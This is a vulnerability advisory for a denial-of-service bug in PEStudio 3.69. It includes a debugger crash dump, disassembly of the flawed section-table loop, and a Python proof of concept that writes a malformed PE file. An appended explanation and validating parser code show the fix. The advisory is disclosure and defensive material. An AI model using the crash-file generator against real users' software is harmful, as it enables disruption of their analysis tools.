PEStudio 3.69 - Denial of Service
Source: https://twitter.com/debasishm89 Author: Mandal Published: 2013-06-06
# Title: PEStudio Version 3.69 Denial of Service
# Date: 5th June 2013
# Author: Debasish Mandal ( https://twitter.com/debasishm89 )
# Blog : http://www.debasish.in/
# Software Homepage: http://www.winitor.com/
# Version: PEStudio Version 3.69
# Tested on: Windows XP SP2 / Windows 7
# Vendor Patch : Recently released stable version (v6.91) is not affected.

'''
 
[+] Affected Module : peparser.dll version 3.69
 
[+] Crash Point:
 
(6b4.17c): Access violation - code c0000005 (!!! second chance !!!)
eax=00000000 ebx=41414141 ecx=013f41d9 edx=013f0080 esi=00000000 edi=00004141
eip=3001ce70 esp=0012d15c ebp=00a26100 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000             efl=00000206
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Documents and Settings\debasish mandal\Desktop\Tools\PeStudio369\PeParser.dll - 
PeParser!PeParser::IPeParserFactory::Destroy+0xf1d0:
3001ce70 8b510c          mov     edx,dword ptr [ecx+0Ch] ds:0023:013f41e5=????????
0:000> u eip
PeParser!PeParser::IPeParserFactory::Destroy+0xf1d0:
3001ce70 8b510c          mov     edx,dword ptr [ecx+0Ch]
3001ce73 3bda            cmp     ebx,edx
3001ce75 7209            jb      PeParser!PeParser::IPeParserFactory::Destroy+0xf1e0 (3001ce80)
3001ce77 8b6908          mov     ebp,dword ptr [ecx+8]
3001ce7a 03ea            add     ebp,edx
3001ce7c 3bdd            cmp     ebx,ebp
3001ce7e 720c            jb      PeParser!PeParser::IPeParserFactory::Destroy+0xf1ec (3001ce8c)
3001ce80 46              inc     esi
 
[+] IDA Pro snapshot of the buggy function (code from peparser.dll version 3.69):

.text:3001CE40 sub_3001CE40    proc near               ; CODE XREF: sub_30003510+154p
.text:3001CE40                                         ; sub_300184D0+4Bp
.text:3001CE40                 mov     ecx, [ecx+4]
.text:3001CE43                 xor     eax, eax
.text:3001CE45                 test    ecx, ecx
.text:3001CE47                 jz      short locret_3001CE91
.text:3001CE49                 mov     edx, [ecx+1Ch]
.text:3001CE4C                 movzx   ecx, word ptr [edx+14h]
.text:3001CE50                 lea     ecx, [ecx+edx+18h]
.text:3001CE54                 test    ecx, ecx
.text:3001CE56                 jz      short locret_3001CE91
.text:3001CE58                 test    ebx, ebx
.text:3001CE5A                 jz      short locret_3001CE91
.text:3001CE5C                 push    esi
.text:3001CE5D                 push    edi
.text:3001CE5E                 movzx   edi, word ptr [edx+6]
.text:3001CE62                 xor     esi, esi
.text:3001CE64                 test    edi, edi
.text:3001CE66                 jle     short loc_3001CE8F
.text:3001CE68                 push    ebp
.text:3001CE69                 lea     esp, [esp+0]
.text:3001CE70
.text:3001CE70 loc_3001CE70:                           ; CODE XREF: sub_3001CE40+46j
.text:3001CE70                 mov     edx, [ecx+0Ch]    <-- Crash
.text:3001CE73                 cmp     ebx, edx
.text:3001CE75                 jb      short loc_3001CE80
.text:3001CE77                 mov     ebp, [ecx+8]
.text:3001CE7A                 add     ebp, edx
.text:3001CE7C                 cmp     ebx, ebp
.text:3001CE7E                 jb      short loc_3001CE8C
.text:3001CE80
.text:3001CE80 loc_3001CE80:                           ; CODE XREF: sub_3001CE40+35j
.text:3001CE80                 inc     esi
.text:3001CE81                 add     ecx, 28h
.text:3001CE84                 cmp     esi, edi
.text:3001CE86                 jl      short loc_3001CE70
.text:3001CE88                 pop     ebp
.text:3001CE89                 pop     edi
.text:3001CE8A                 pop     esi
.text:3001CE8B                 retn
.text:3001CE8C ; ---------------------------------------------------------------------------

[+] Proof of Concept:

'''
#!/usr/bin/python
# Writes a 365-byte file: a DOS header whose e_lfanew (offset 0x3c) points to
# 0x80, followed by a "PE" signature and 0x41 filler, so NumberOfSections and
# SizeOfOptionalHeader are both read as 0x4141 and the section-table loop in
# sub_3001CE40 walks far past the end of the mapped file.
header = b"MZ"                   # IMAGE_DOS_HEADER.e_magic
header += b"A" * 58
header += b"\x80\x00\x00\x00"   # e_lfanew = 0x80
header += b"A" * 3
header += b"\x0e"
header += b"A" * 60
header += b"PE"                  # NT signature at offset 0x80
header += b"A" * 235             # IMAGE_FILE_HEADER and everything after: 0x41
with open('POC.exe', 'wb') as f:
    f.write(header)
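The loop in the disassembly is an RVA-to-section lookup: [edx+14h] is SizeOfOptionalHeader, [edx+6] is NumberOfSections, and loc_3001CE70 steps through 0x28-byte section headers comparing the RVA in ebx against VirtualAddress/VirtualSize without checking that the table lies inside the file, which is why the PoC's 0x4141 values put ecx at 013f41d9 (edx + 0x18 + 0x4141) and fault on the first read. The Python below is an added example, not the advisory's or PEStudio's code: it rebuilds the PoC bytes in memory and does the same walk over a validated section table. The function names are mine, and the 96-section cap is the Windows loader's limit.

```python
import struct

SECTION_HEADER_SIZE = 0x28   # sizeof(IMAGE_SECTION_HEADER)
MAX_SECTIONS = 96            # limit enforced by the Windows loader


def build_poc(fix_signature=False):
    """Constructed in-memory copy of the advisory's POC.exe (365 bytes).
    fix_signature=True swaps the 'PE' + 'AA' bytes for a real 'PE\\0\\0' so the
    file gets past the signature check and reaches the section-table check."""
    sig = b"PE\x00\x00" if fix_signature else b"PEAA"
    return (b"MZ" + b"A" * 58 + b"\x80\x00\x00\x00" + b"A" * 3 + b"\x0e"
            + b"A" * 60 + sig + b"A" * 233)


def section_table(data):
    """Return (offset, count) of the section table, validating each step the
    3.69 loop skips: e_lfanew, the NT signature and the table end in bounds."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 0x18 > len(data):
        raise ValueError("e_lfanew 0x%x points past end of file" % e_lfanew)
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("bad NT signature at 0x%x" % e_lfanew)
    # IMAGE_FILE_HEADER follows the 4-byte signature: NumberOfSections at +6
    # and SizeOfOptionalHeader at +0x14 (the [edx+6] / [edx+14h] loads above).
    count = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 0x14)[0]
    offset = e_lfanew + 0x18 + opt_size
    if count > MAX_SECTIONS or offset + count * SECTION_HEADER_SIZE > len(data):
        raise ValueError("section table: %d entries at 0x%x exceed %d-byte file"
                         % (count, offset, len(data)))
    return offset, count


def find_section_for_rva(data, rva):
    """Index of the section whose [VirtualAddress, +VirtualSize) holds rva,
    or None: the same walk as loc_3001CE70, but over a validated table."""
    offset, count = section_table(data)
    for i in range(count):
        hdr = offset + i * SECTION_HEADER_SIZE
        vsize, vaddr = struct.unpack_from("<II", data, hdr + 8)  # +8, +0xC
        if vaddr <= rva < vaddr + vsize:
            return i
    return None
```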


CopyRight © 2002-2022 VFocuS.Net All Rights Reserved